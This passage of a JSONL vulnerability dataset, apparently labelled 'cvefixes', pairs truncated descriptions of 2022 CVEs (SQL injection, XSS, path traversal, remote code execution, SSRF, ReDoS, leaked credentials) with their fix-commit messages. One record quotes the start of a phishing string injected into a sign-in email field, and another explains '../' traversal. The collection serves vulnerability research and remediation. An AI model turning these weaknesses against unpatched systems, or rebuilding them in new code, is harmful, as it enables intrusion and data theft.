GHSA-g4hm-6vfr-q3wg", "cve_id": "CVE-2022-31068", "source": "cvefixes", "timestamp": ""} {"id": "649024918f601a4e9d22", "text": "CVE: CVE-2022-31071\n\n[{'lang': 'en', 'value': 'Octopoller is a micro gem for polling and retrying. Version 0.2.0 of the octopoller gem was published containing world-writeable files. Specifically, the gem was packed with files having their permissions set to `-rw-rw-rw-` (i.e. 0666) instead of `rw-r--r--` (i.e. 0644). This means everyone who is not the owner (Group and Public) with access to the instance where this release had been installed could modify the world-writable files from this gem. T", "cve_id": "CVE-2022-31071", "source": "cvefixes", "timestamp": ""} {"id": "8669289dc0e6d21219e6", "text": "CVE: CVE-2022-31072\n\n[{'lang': 'en', 'value': 'Octokit is a Ruby toolkit for the GitHub API. Versions 4.23.0 and 4.24.0 of the octokit gem were published containing world-writeable files. Specifically, the gem was packed with files having their permissions set to `-rw-rw-rw-` (i.e. 0666) instead of `rw-r--r--` (i.e. 0644). This means everyone who is not the owner (Group and Public) with access to the instance where this release had been installed could modify the world-writable files from this g", "cve_id": "CVE-2022-31072", "source": "cvefixes", "timestamp": ""} {"id": "4a2bd3e8a7b8bac139ce", "text": "CVE: CVE-2022-31081\n\n[{'lang': 'en', 'value': \"HTTP::Daemon is a simple http server class written in perl. Versions prior to 6.15 are subject to a vulnerability which could potentially be exploited to gain privileged access to APIs or poison intermediate caches. It is uncertain how large the risks are, most Perl based applications are served on top of Nginx or Apache, not on the `HTTP::Daemon`. This library is commonly used for local development and tests. Users are advised to update to resolve ", "cve_id": "CVE-2022-31081", "source": "cvefixes", "timestamp": ""} {"id": "e851d8383c7dc1170db9", "text": "CVE: CVE-2022-31082\n\n[{'lang': 'en', 'value': 'GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. glpi-inventory-plugin is a plugin for GLPI to handle inventory management. In affected versions a SQL injection can be made using package deployment tasks. This issue has been resolved in version 1.0.2. Users are advised to upgrade. Users unable to upgrade should delete the `front/deploypackage.public.php` file", "cve_id": "CVE-2022-31082", "source": "cvefixes", "timestamp": ""} {"id": "75163069f88bac0378f4", "text": "CVE: CVE-2022-31084\n\n[{'lang': 'en', 'value': 'LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. In versions prior to 8.0 There are cases where LAM instantiates objects from arbitrary classes. An attacker can inject the first constructor argument. This can lead to code execution if non-LAM classes are instantiated that execute code during object creation. This issue has been fixed in version 8.0.'}]\n\nFix commit: Merg", "cve_id": "CVE-2022-31084", "source": "cvefixes", "timestamp": ""} {"id": "2d23b21042e947f04320", "text": "CVE: CVE-2022-31085\n\n[{'lang': 'en', 'value': 'LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. In versions prior to 8.0 the session files include the LDAP user name and password in clear text if the PHP OpenSSL extension is not installed or encryption is disabled by configuration. This issue has been fixed in version 8.0. Users unable to upgrade should install the PHP OpenSSL extension and make sure session encrypt", "cve_id": "CVE-2022-31085", "source": "cvefixes", "timestamp": ""} {"id": "18ad3ace092f34dad9c5", "text": "CVE: CVE-2022-31086\n\n[{'lang': 'en', 'value': 'LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. In versions prior to 8.0 incorrect regular expressions allow to upload PHP scripts to config/templates/pdf. This vulnerability could lead to a Remote Code Execution if the /config/templates/pdf/ directory is accessible for remote users. This is not a default configuration of LAM. This issue has been fixed in version 8.0. ", "cve_id": "CVE-2022-31086", "source": "cvefixes", "timestamp": ""} {"id": "e25c298c2e6cbef74bac", "text": "CVE: CVE-2022-31087\n\n[{'lang': 'en', 'value': 'LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. In versions prior to 8.0 the tmp directory, which is accessible by /lam/tmp/, allows interpretation of .php (and .php5/.php4/.phpt/etc) files. An attacker capable of writing files under www-data privileges can write a web-shell into this directory, and gain a Code Execution on the host. This issue has been fixed in versio", "cve_id": "CVE-2022-31087", "source": "cvefixes", "timestamp": ""} {"id": "dcc02eeba77bbc5da7d6", "text": "CVE: CVE-2022-31088\n\n[{'lang': 'en', 'value': 'LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. In versions prior to 8.0 the user name field at login could be used to enumerate LDAP data. This is only the case for LDAP search configuration. This issue has been fixed in version 8.0.'}]\n\nFix commit: Merge pull request from GHSA-r387-grjx-qgvw\n\nFixes", "cve_id": "CVE-2022-31088", "source": "cvefixes", "timestamp": ""} {"id": "ef30748276136ad151e0", "text": "CVE: CVE-2022-31090\n\n[{'lang': 'en', 'value': 'Guzzle, an extensible PHP HTTP client. `Authorization` headers on requests are sensitive information. In affected versions when using our Curl handler, it is possible to use the `CURLOPT_HTTPAUTH` option to specify an `Authorization` header. On making a request which responds with a redirect to a URI with a different origin (change in host, scheme or port), if we choose to follow it, we should remove the `CURLOPT_HTTPAUTH` option before continuing, ", "cve_id": "CVE-2022-31090", "source": "cvefixes", "timestamp": ""} {"id": "daa5032fe2aa84cea38b", "text": "CVE: CVE-2022-31091\n\n[{'lang': 'en', 'value': 'Guzzle, an extensible PHP HTTP client. `Authorization` and `Cookie` headers on requests are sensitive information. In affected versions on making a request which responds with a redirect to a URI with a different port, if we choose to follow it, we should remove the `Authorization` and `Cookie` headers from the request, before containing. Previously, we would only consider a change in host or scheme. Affected Guzzle 7 users should upgrade to Guzzle ", "cve_id": "CVE-2022-31091", "source": "cvefixes", "timestamp": ""} {"id": "a774ed10978bfeea9673", "text": "CVE: CVE-2022-31092\n\n[{'lang': 'en', 'value': \"Pimcore is an Open Source Data & Experience Management Platform. Pimcore offers developers listing classes to make querying data easier. This listing classes also allow to order or group the results based on one or more columns which should be quoted by default. The actual issue is that quoting is not done properly in both cases, so there's the theoretical possibility to inject custom SQL if the developer is using this methods with input data and no", "cve_id": "CVE-2022-31092", "source": "cvefixes", "timestamp": ""} {"id": "79308c8e328109920ce9", "text": "CVE: CVE-2022-31093\n\n[{'lang': 'en', 'value': 'NextAuth.js is a complete open source authentication solution for Next.js applications. In affected versions an attacker can send a request to an app using NextAuth.js with an invalid `callbackUrl` query parameter, which internally is converted to a `URL` object. The URL instantiation would fail due to a malformed URL being passed into the constructor, causing it to throw an unhandled error which led to the **API route handler timing out and logging", "cve_id": "CVE-2022-31093", "source": "cvefixes", "timestamp": ""} {"id": "57af2e9425d95ac2ed35", "text": "CVE: CVE-2022-31094\n\n[{'lang': 'en', 'value': 'ScratchTools is a web extension designed to make interacting with the Scratch programming language community (Scratching) easier. In affected versions anybody who uses the Recently Viewed Projects feature is vulnerable to having their account taken over if they view a project that tries to. The issue is that if a user visits a project that includes Javascript in the title, then when the Recently Viewed Projects feature displays it, it could run the ", "cve_id": "CVE-2022-31094", "source": "cvefixes", "timestamp": ""} {"id": "0a1d566090735155fb7f", "text": "CVE: CVE-2022-31098\n\n[{'lang': 'en', 'value': \"Weave GitOps is a simple open source developer platform for people who want cloud native applications, without needing Kubernetes expertise. A vulnerability in the logging of Weave GitOps could allow an authenticated remote attacker to view sensitive cluster configurations, aka KubeConfg, of registered Kubernetes clusters, including the service account tokens in plain text from Weave GitOps's pod logs on the management cluster. An unauthorized remot", "cve_id": "CVE-2022-31098", "source": "cvefixes", "timestamp": ""} {"id": "f83f4776ce90206ea756", "text": "CVE: CVE-2022-31099\n\n[{'lang': 'en', 'value': 'rulex is a new, portable, regular expression language. When parsing untrusted rulex expressions, the stack may overflow, possibly enabling a Denial of Service attack. This happens when parsing an expression with several hundred levels of nesting, causing the process to abort immediately. This is a security concern for you, if your service parses untrusted rulex expressions (expressions provided by an untrusted user), and your service becomes unavail", "cve_id": "CVE-2022-31099", "source": "cvefixes", "timestamp": ""} {"id": "0f9258b0845bce132d66", "text": "CVE: CVE-2022-31100\n\n[{'lang': 'en', 'value': 'rulex is a new, portable, regular expression language. When parsing untrusted rulex expressions, rulex may crash, possibly enabling a Denial of Service attack. This happens when the expression contains a multi-byte UTF-8 code point in a string literal or after a backslash, because rulex tries to slice into the code point and panics as a result. This is a security concern for you, if your service parses untrusted rulex expressions (expressions provid", "cve_id": "CVE-2022-31100", "source": "cvefixes", "timestamp": ""} {"id": "310b00314b4dd7459422", "text": "CVE: CVE-2022-31101\n\n[{'lang': 'en', 'value': \"prestashop/blockwishlist is a prestashop extension which adds a block containing the customer's wishlists. In affected versions an authenticated customer can perform SQL injection. This issue is fixed in version 2.1.1. Users are advised to upgrade. There are no known workarounds for this issue.\"}]\n\nFix commit: Merge pull request from GHSA-2jx3-5j9v-prpp\n\nValidate order by and order way", "cve_id": "CVE-2022-31101", "source": "cvefixes", "timestamp": ""} {"id": "9a3c71df9fa43373ee28", "text": "CVE: CVE-2022-31103\n\n[{'lang': 'en', 'value': 'lettersanitizer is a DOM-based HTML email sanitizer for in-browser email rendering. All versions of lettersanitizer below 1.0.2 are affected by a denial of service issue when processing a CSS at-rule `@keyframes`. This package is depended on by [react-letter](https://github.com/mat-sz/react-letter), therefore everyone using react-letter is also at risk. The problem has been patched in version 1.0.2.'}]\n\nFix commit: filter out unsupported at-rules", "cve_id": "CVE-2022-31103", "source": "cvefixes", "timestamp": ""} {"id": "b3b5b9aa52a5abb47079", "text": "CVE: CVE-2022-31106\n\n[{'lang': 'en', 'value': 'Underscore.deep is a collection of Underscore mixins that operate on nested objects. Versions of `underscore.deep` prior to version 0.5.3 are vulnerable to a prototype pollution vulnerability. An attacker can craft a malicious payload and pass it to `deepFromFlat`, which would pollute any future Objects created. Any users that have `deepFromFlat` or `deepPick` (due to its dependency on `deepFromFlat`) in their code should upgrade to version 0.5.3 as", "cve_id": "CVE-2022-31106", "source": "cvefixes", "timestamp": ""} {"id": "04c675fd1628b0677511", "text": "CVE: CVE-2022-31108\n\n[{'lang': 'en', 'value': 'Mermaid is a JavaScript based diagramming and charting tool that uses Markdown-inspired text definitions and a renderer to create and modify complex diagrams. An attacker is able to inject arbitrary `CSS` into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted `CSS` selectors. The following example shows how an attacker can ex", "cve_id": "CVE-2022-31108", "source": "cvefixes", "timestamp": ""} {"id": "8b963342664a25ad2eb6", "text": "CVE: CVE-2022-31109\n\n[{'lang': 'en', 'value': 'laminas-diactoros is a PHP package containing implementations of the PSR-7 HTTP message interfaces and PSR-17 HTTP message factory interfaces. Applications that use Diactoros, and are either not behind a proxy, or can be accessed via untrusted proxies, can potentially have the host, protocol, and/or port of a `Laminas\\\\Diactoros\\\\Uri` instance associated with the incoming server request modified to reflect values from `X-Forwarded-*` headers. Such c", "cve_id": "CVE-2022-31109", "source": "cvefixes", "timestamp": ""} {"id": "8edc3adb7e2c56993496", "text": "CVE: CVE-2022-31110\n\n[{'lang': 'en', 'value': 'RSSHub is an open source, extensible RSS feed generator. In commits prior to 5c4177441417 passing some special values to the `filter` and `filterout` parameters can cause an abnormally high CPU. This results in an impact on the performance of the servers and RSSHub services which may lead to a denial of service. This issue has been fixed in commit 5c4177441417 and all users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nF", "cve_id": "CVE-2022-31110", "source": "cvefixes", "timestamp": ""} {"id": "7fc365d10488ec071df4", "text": "CVE: CVE-2022-31111\n\n[{'lang': 'en', 'value': \"Frontier is Substrate's Ethereum compatibility layer. In affected versions the truncation done when converting between EVM balance type and Substrate balance type was incorrectly implemented. This leads to possible discrepancy between appeared EVM transfer value and actual Substrate value transferred. It is recommended that an emergency upgrade to be planned and EVM execution temporarily paused in the mean time. The issue is patched in Frontier mast", "cve_id": "CVE-2022-31111", "source": "cvefixes", "timestamp": ""} {"id": "afa7d3f17ffa9736cce0", "text": "CVE: CVE-2022-31112\n\n[{'lang': 'en', 'value': 'Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. In affected versions parse Server LiveQuery does not remove protected fields in classes, passing them to the client. The LiveQueryController now removes protected fields from the client response. Users are advised to upgrade. Users unable t upgrade should use `Parse.Cloud.afterLiveQueryEvent` to manually remove protected fields.'}]\n\nFix commit: fi", "cve_id": "CVE-2022-31112", "source": "cvefixes", "timestamp": ""} {"id": "776247c30c713947e827", "text": "CVE: CVE-2022-31113\n\n[{'lang': 'en', 'value': \"Canarytokens is an open source tool which helps track activity and actions on your network. A Cross-Site Scripting vulnerability was identified in the history page of triggered Canarytokens. This permits an attacker who recognised an HTTP-based Canarytoken (a URL) to execute Javascript in the Canarytoken's history page (domain: canarytokens.org) when the history page is later visited by the Canarytoken's creator. This vulnerability could be used to ", "cve_id": "CVE-2022-31113", "source": "cvefixes", "timestamp": ""} {"id": "bdb7559bde78dffcb944", "text": "CVE: CVE-2022-31116\n\n[{'lang': 'en', 'value': \"UltraJSON is a fast JSON encoder and decoder written in pure C with bindings for Python 3.7+. Affected versions were found to improperly decode certain characters. JSON strings that contain escaped surrogate characters not part of a proper surrogate pair were decoded incorrectly. Besides corrupting strings, this allowed for potential key confusion and value overwriting in dictionaries. All users parsing JSON from untrusted sources are vulnerable. Fr", "cve_id": "CVE-2022-31116", "source": "cvefixes", "timestamp": ""} {"id": "02d6ded99d283b494b06", "text": "CVE: CVE-2022-31117\n\n[{'lang': 'en', 'value': 'UltraJSON is a fast JSON encoder and decoder written in pure C with bindings for Python 3.7+. In versions prior to 5.4.0 an error occurring while reallocating a buffer for string decoding can cause the buffer to get freed twice. Due to how UltraJSON uses the internal decoder, this double free is impossible to trigger from Python. This issue has been resolved in version 5.4.0 and all users should upgrade to UltraJSON 5.4.0. There are no known workaro", "cve_id": "CVE-2022-31117", "source": "cvefixes", "timestamp": ""} {"id": "5cff1538fd9d3658b917", "text": "CVE: CVE-2022-31121\n\n[{'lang': 'en', 'value': 'Hyperledger Fabric is a permissioned distributed ledger framework. In affected versions if a consensus client sends a malformed consensus request to an orderer it may crash the orderer node. A fix has been added in commit 0f1835949 which checks for missing consensus messages and returns an error to the consensus client should the message be missing. Users are advised to upgrade to versions 2.2.7 or v2.4.5. There are no known workarounds for this iss", "cve_id": "CVE-2022-31121", "source": "cvefixes", "timestamp": ""} {"id": "eadf0f5232ca35cb7e8a", "text": "CVE: CVE-2022-31124\n\n[{'lang': 'en', 'value': \"openssh_key_parser is an open source Python package providing utilities to parse and pack OpenSSH private and public key files. In versions prior to 0.0.6 if a field of a key is shorter than it is declared to be, the parser raises an error with a message containing the raw field value. An attacker able to modify the declared length of a key's sensitive field can thus expose the raw value of that field. Users are advised to upgrade to version 0.0.6, ", "cve_id": "CVE-2022-31124", "source": "cvefixes", "timestamp": ""} {"id": "bd44dd05d2c5a0b2ac29", "text": "CVE: CVE-2022-31127\n\n[{'lang': 'en', 'value': 'NextAuth.js is a complete open source authentication solution for Next.js applications. An attacker can pass a compromised input to the e-mail [signin endpoint](https://next-auth.js.org/getting-started/rest-api#post-apiauthsigninprovider) that contains some malicious HTML, tricking the e-mail server to send it to the user, so they can perform a phishing attack. Eg.: `balazs@email.com, Before signing in, claim your money", "cve_id": "CVE-2022-31127", "source": "cvefixes", "timestamp": ""} {"id": "dc3e5e13e7f3b31e0c5f", "text": "CVE: CVE-2022-31128\n\n[{'lang': 'en', 'value': 'Tuleap is a Free & Open Source Suite to improve management of software developments and collaboration. In affected versions Tuleap does not properly verify permissions when creating branches with the REST API in Git repositories using the fine grained permissions. Users can create branches via the REST endpoint `POST git/:id/branches` regardless of the permissions set on the repository. This issue has been fixed in version 13.10.99.82 Tuleap Communi", "cve_id": "CVE-2022-31128", "source": "cvefixes", "timestamp": ""} {"id": "1e955502b4a47dad49ef", "text": "CVE: CVE-2022-31129\n\n[{'lang': 'en', 'value': 'moment is a JavaScript date library for parsing, validating, manipulating, and formatting dates. Affected versions of moment were found to use an inefficient parsing algorithm. Specifically using string-to-date parsing in moment (more specifically rfc2822 parsing, which is tried by default) has quadratic (N^2) complexity on specific inputs. Users may notice a noticeable slowdown is observed with inputs above 10k characters. Users who pass user-provi", "cve_id": "CVE-2022-31129", "source": "cvefixes", "timestamp": ""} {"id": "964acfe562ac61ff4076", "text": "CVE: CVE-2022-31133\n\n[{'lang': 'en', 'value': 'HumHub is an Open Source Enterprise Social Network. Affected versions of HumHub are vulnerable to a stored Cross-Site Scripting (XSS) vulnerability. For exploitation, the attacker would need a permission to administer the Spaces feature. The names of individual \"spaces\" are not properly escaped and so an attacker with sufficient privilege could insert malicious javascript into a space name and exploit system users who visit that space. It is recomme", "cve_id": "CVE-2022-31133", "source": "cvefixes", "timestamp": ""} {"id": "d77503b9d0aa62add798", "text": "CVE: CVE-2022-31135\n\n[{'lang': 'en', 'value': 'Akashi is an open source server implementation of the Attorney Online video game based on the Ace Attorney universe. Affected versions of Akashi are subject to a denial of service attack. An attacker can use a specially crafted evidence packet to make an illegal modification, causing a server crash. This can be used to mount a denial-of-service exploit. Users are advised to upgrade. There is no known workaround for this issue.'}]\n\nFix commit: Fix ou", "cve_id": "CVE-2022-31135", "source": "cvefixes", "timestamp": ""} {"id": "116f73519898477af2db", "text": "CVE: CVE-2022-31136\n\n[{'lang': 'en', 'value': 'Bookwyrm is an open source social reading and reviewing program. Versions of Bookwyrm prior to 0.4.1 did not properly sanitize html being rendered to users. Unprivileged users are able to inject scripts into user profiles, book descriptions, and statuses. These vulnerabilities may be exploited as cross site scripting attacks on users viewing these fields. Users are advised to upgrade to version 0.4.1. There are no known workarounds for this issue.'}", "cve_id": "CVE-2022-31136", "source": "cvefixes", "timestamp": ""} {"id": "2ffa3d2e1ce4fab1ba83", "text": "CVE: CVE-2022-31137\n\n[{'lang': 'en', 'value': 'Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. Versions prior to 6.1.1.0 are subject to a remote code execution vulnerability. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. Attackers need not be authenticated to exploit this vulnerability. Users are advised to upgrade. There are no known workarounds for ", "cve_id": "CVE-2022-31137", "source": "cvefixes", "timestamp": ""} {"id": "5af13407b2aa8ffe46fd", "text": "CVE: CVE-2022-31138\n\n[{'lang': 'en', 'value': 'mailcow is a mailserver suite. Prior to mailcow-dockerized version 2022-06a, an extended privilege vulnerability can be exploited by manipulating the custom parameters regexmess, skipmess, regexflag, delete2foldersonly, delete2foldersbutnot, regextrans2, pipemess, or maxlinelengthcmd to execute arbitrary code. Users should update their mailcow instances with the `update.sh` script in the mailcow root directory to 2022-06a or newer to receive a patch", "cve_id": "CVE-2022-31138", "source": "cvefixes", "timestamp": ""} {"id": "1f73f1152ca92b21a51e", "text": "CVE: CVE-2022-31139\n\n[{'lang': 'en', 'value': \"UnsafeAccessor (UA) is a bridge to access jdk.internal.misc.Unsafe & sun.misc.Unsafe. Normally, if UA is loaded as a named module, the internal data of UA is protected by JVM and others can only access UA via UA's standard API. The main application can set up `SecurityCheck.AccessLimiter` for UA to limit access to UA. Starting with version 1.4.0 and prior to version 1.7.0, when `SecurityCheck.AccessLimiter` is set up, untrusted code can access UA wi", "cve_id": "CVE-2022-31139", "source": "cvefixes", "timestamp": ""} {"id": "3690e9799be328c13fcf", "text": "CVE: CVE-2022-31142\n\n[{'lang': 'en', 'value': '@fastify/bearer-auth is a Fastify plugin to require bearer Authorization headers. @fastify/bearer-auth prior to versions 7.0.2 and 8.0.1 does not securely use crypto.timingSafeEqual. A malicious attacker could estimate the length of one valid bearer token. According to the corresponding RFC 6750, the bearer token has only base64 valid characters, reducing the range of characters for a brute force attack. Version 7.0.2 and 8.0.1 of @fastify/bearer-au", "cve_id": "CVE-2022-31142", "source": "cvefixes", "timestamp": ""} {"id": "6fc613bacf90d2de0ae0", "text": "CVE: CVE-2022-31145\n\n[{'lang': 'en', 'value': 'FlyteAdmin is the control plane for Flyte responsible for managing entities and administering workflow executions. In versions 1.1.30 and prior, authenticated users using an external identity provider can continue to use Access Tokens and ID Tokens even after they expire. Users who use FlyteAdmin as the OAuth2 Authorization Server are unaffected by this issue. A patch is available on the `master` branch of the repository. As a workaround, rotating s", "cve_id": "CVE-2022-31145", "source": "cvefixes", "timestamp": ""} {"id": "8967aa9330a648170427", "text": "CVE: CVE-2022-31147\n\n[{'lang': 'en', 'value': 'The jQuery Validation Plugin (jquery-validation) provides drop-in validation for forms. Versions of jquery-validation prior to 1.19.5 are vulnerable to regular expression denial of service (ReDoS) when an attacker is able to supply arbitrary input to the url2 method. This is due to an incomplete fix for CVE-2021-43306. Users should upgrade to version 1.19.5 to receive a patch.'}]\n\nFix commit: Merge pull request from GHSA-ffmh-x56j-9rc3\n\n(cherry pick", "cve_id": "CVE-2022-31147", "source": "cvefixes", "timestamp": ""} {"id": "f362fc205f684e2f1ba0", "text": "CVE: CVE-2022-31148\n\n[{'lang': 'en', 'value': 'Shopware is an open source e-commerce software. In versions from 5.7.0 a persistent cross site scripting (XSS) vulnerability exists in the customer module. Users are recommend to update to the current version 5.7.14. You can get the update to 5.7.14 regularly via the Auto-Updater or directly via the download overview. There are no known workarounds for this issue.'}]\n\nFix commit: SW-26866 - Add test for marketing core class", "cve_id": "CVE-2022-31148", "source": "cvefixes", "timestamp": ""} {"id": "bbb53f82e9703850b37f", "text": "CVE: CVE-2022-31153\n\n[{'lang': 'en', 'value': \"OpenZeppelin Contracts for Cairo is a library for contract development written in Cairo for StarkNet, a decentralized ZK Rollup. Version 0.2.0 is vulnerable to an error that renders account contracts unusable on live networks. This issue affects all accounts (vanilla and ethereum flavors) in the v0.2.0 release of OpenZeppelin Contracts for Cairo, which are not whitelisted on StarkNet mainnet. Only goerli deployments of v0.2.0 accounts are affected. ", "cve_id": "CVE-2022-31153", "source": "cvefixes", "timestamp": ""} {"id": "8ba9b2b0179f6acd3315", "text": "CVE: CVE-2022-31155\n\n[{'lang': 'en', 'value': 'Sourcegraph is an opensource code search and navigation engine. In Sourcegraph versions before 3.41.0, it is possible for an attacker to delete other users’ saved searches due to a bug in the authorization check. The vulnerability does not allow the reading of other users’ saved searches, only overwriting them with attacker-controlled searches. The issue is patched in Sourcegraph version 3.41.0. There is no workaround for this issue and updating", "cve_id": "CVE-2022-31155", "source": "cvefixes", "timestamp": ""} {"id": "34970a152d76c7a6493f", "text": "CVE: CVE-2022-31160\n\n[{'lang': 'en', 'value': 'jQuery UI is a curated set of user interface interactions, effects, widgets, and themes built on top of jQuery. Versions prior to 1.13.2 are potentially vulnerable to cross-site scripting. Initializing a checkboxradio widget on an input enclosed within a label makes that parent label contents considered as the input label. Calling `.checkboxradio( \"refresh\" )` on such a widget and the initial HTML contained encoded HTML entities will make them erron", "cve_id": "CVE-2022-31160", "source": "cvefixes", "timestamp": ""} {"id": "c220b509596e943fca47", "text": "CVE: CVE-2022-31168\n\n[{'lang': 'en', 'value': 'Zulip is an open source team chat tool. Due to an incorrect authorization check in Zulip Server 5.4 and earlier, a member of an organization could craft an API call that grants organization administrator privileges to one of their bots. The vulnerability is fixed in Zulip Server 5.5. Members who don’t own any bots, and lack permission to create them, can’t exploit the vulnerability. As a workaround for the vulnerability, an organization administ", "cve_id": "CVE-2022-31168", "source": "cvefixes", "timestamp": ""} {"id": "495695ca02ec069b92b6", "text": "CVE: CVE-2022-31169\n\n[{'lang': 'en', 'value': \"Wasmtime is a standalone runtime for WebAssembly. There is a bug in Wasmtime's code generator, Cranelift, for AArch64 targets where constant divisors can result in incorrect division results at runtime. This affects Wasmtime prior to version 0.38.2 and Cranelift prior to 0.85.2. This issue only affects the AArch64 platform. Other platforms are not affected. The translation rules for constants did not take into account whether sign or zero-extension ", "cve_id": "CVE-2022-31169", "source": "cvefixes", "timestamp": ""} {"id": "22ce98095159626e8950", "text": "CVE: CVE-2022-31173\n\n[{'lang': 'en', 'value': 'Juniper is a GraphQL server library for Rust. Affected versions of Juniper are vulnerable to uncontrolled recursion resulting in a program crash. This issue has been addressed in version 0.15.10. Users are advised to upgrade. Users unable to upgrade should limit the recursion depth manually.'}]\n\nFix commit: Backport CVE-2022-31173 fix from GHSA-4rx6-g5vg-5f3j\n\nCo-authored-by: ilslv ", "cve_id": "CVE-2022-31173", "source": "cvefixes", "timestamp": ""} {"id": "f6a48158da19a92bcb7b", "text": "CVE: CVE-2022-31173\n\n[{'lang': 'en', 'value': 'Juniper is a GraphQL server library for Rust. Affected versions of Juniper are vulnerable to uncontrolled recursion resulting in a program crash. This issue has been addressed in version 0.15.10. Users are advised to upgrade. Users unable to upgrade should limit the recursion depth manually.'}]\n\nFix commit: Merge pull request from GHSA-4rx6-g5vg-5f3j\n\n* Replace recursions with heap allocations\n\n* Some corrections [skip ci]\n\n* Add recursive nested fr", "cve_id": "CVE-2022-31173", "source": "cvefixes", "timestamp": ""} {"id": "e91b0d42632ca23129a6", "text": "CVE: CVE-2022-31183\n\n[{'lang': 'en', 'value': 'fs2 is a compositional, streaming I/O library for Scala. When establishing a server-mode `TLSSocket` using `fs2-io` on Node.js, the parameter `requestCert = true` is ignored, peer certificate verification is skipped, and the connection proceeds. The vulnerability is limited to: 1. `fs2-io` running on Node.js. The JVM TLS implementation is completely independent. 2. `TLSSocket`s in server-mode. Client-mode `TLSSocket`s are implemented via a different", "cve_id": "CVE-2022-31183", "source": "cvefixes", "timestamp": ""} {"id": "151b94f8532265fd857f", "text": "CVE: CVE-2022-31185\n\n[{'lang': 'en', 'value': \"mprweb is a hosting platform for the makedeb Package Repository. Email addresses were found to not have been hidden, even if a user had clicked the `Hide Email Address` checkbox on their account page, or during signup. This could lead to an account's email being leaked, which may be problematic if your email needs to remain private for any reason. Users hosting their own mprweb instance will need to upgrade to the latest commit to get this fixed. Us", "cve_id": "CVE-2022-31185", "source": "cvefixes", "timestamp": ""} {"id": "907ef38ddbb22d304108", "text": "CVE: CVE-2022-31188\n\n[{'lang': 'en', 'value': 'CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix commit: Added validation for URLs which used as remote data source (#4387)", "cve_id": "CVE-2022-31188", "source": "cvefixes", "timestamp": ""} {"id": "7bd9b4632780b0600754", "text": "CVE: CVE-2022-31197\n\n[{'lang': 'en', 'value': \"PostgreSQL JDBC Driver (PgJDBC for short) allows Java programs to connect to a PostgreSQL database using standard, database independent Java code. The PGJDBC implementation of the `java.sql.ResultRow.refreshRow()` method is not performing escaping of column names so a malicious column name that contains a statement terminator, e.g. `;`, could lead to SQL injection. This could lead to executing additional SQL commands as the application's JDBC user. ", "cve_id": "CVE-2022-31197", "source": "cvefixes", "timestamp": ""} {"id": "efa8017ca147333e2fbd", "text": "CVE: CVE-2022-31306\n\n[{'lang': 'en', 'value': 'Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_array_convert_to_slow_array at src/njs_array.c.'}]\n\nFix commit: Fixed Object.defineProperty() when a recursive descriptor is provided.\n\nThis closes #481 issue on Github.", "cve_id": "CVE-2022-31306", "source": "cvefixes", "timestamp": ""} {"id": "a1fb46f9e5e692add9af", "text": "CVE: CVE-2022-31307\n\n[{'lang': 'en', 'value': 'Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_string_offset at src/njs_string.c.'}]\n\nFix commit: Fixed Array.prototype.lastIndexOf() with unicode string as \"this\".\n\nPreviously, when lastIndexOf() was called with unicode string as \"this\"\nargument and a negative \"fromIndex\" argument null-pointer dererence\nmight occur because njs_string_offset() was called with invalid index\nvalue whereas njs_string_offset() sh", "cve_id": "CVE-2022-31307", "source": "cvefixes", "timestamp": ""} {"id": "bf12c2d1d4b883ac3e68", "text": "CVE: CVE-2022-31502\n\n[{'lang': 'en', 'value': 'The operatorequals/wormnest repository through 0.4.7 on GitHub allows absolute path traversal because the Flask send_file function is used unsafely.'}]\n\nFix commit: Merge pull request #8 from porcupineyhairs/FixPathInjection\n\nFix Path Traversal Vulnerability", "cve_id": "CVE-2022-31502", "source": "cvefixes", "timestamp": ""} {"id": "5ca2a095185744597c2b", "text": "CVE: CVE-2022-31506\n\n[{'lang': 'en', 'value': 'The cmusatyalab/opendiamond repository through 10.1.1 on GitHub allows absolute path traversal because the Flask send_file function is used unsafely.'}]\n\nFix commit: Fix path traversal issues in all dataretriever backends", "cve_id": "CVE-2022-31506", "source": "cvefixes", "timestamp": ""} {"id": "cd20c9fa80fc6bb476cc", "text": "CVE: CVE-2022-31507\n\n[{'lang': 'en', 'value': 'The ganga-devs/ganga repository before 8.5.10 on GitHub allows absolute path traversal because the Flask send_file function is used unsafely.'}]\n\nFix commit: # Absolute Path Traversal due to incorrect use of `send_file` call (#2025)\n\nA path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” seq", "cve_id": "CVE-2022-31507", "source": "cvefixes", "timestamp": ""} {"id": "2c41559ee411c076b801", "text": "CVE: CVE-2022-31508\n\n[{'lang': 'en', 'value': 'The idayrus/evoting repository before 2022-05-08 on GitHub allows absolute path traversal because the Flask send_file function is used unsafely.'}]\n\nFix commit: Merge pull request #2 from porcupineyhairs/FixPathInjection\n\nFix Path Traversal Vulnerability", "cve_id": "CVE-2022-31508", "source": "cvefixes", "timestamp": ""} {"id": "e082392d05e4bcad792a", "text": "CVE: CVE-2022-31549\n\n[{'lang': 'en', 'value': 'The olmax99/helm-flask-celery repository before 2022-05-25 on GitHub allows absolute path traversal because the Flask send_file function is used unsafely.'}]\n\nFix commit: Merge pull request #2 from porcupineyhairs/FixPathInjection\n\nFix Path Traversal Vulnerability", "cve_id": "CVE-2022-31549", "source": "cvefixes", "timestamp": ""} {"id": "d727a9aba44374a674f4", "text": "CVE: 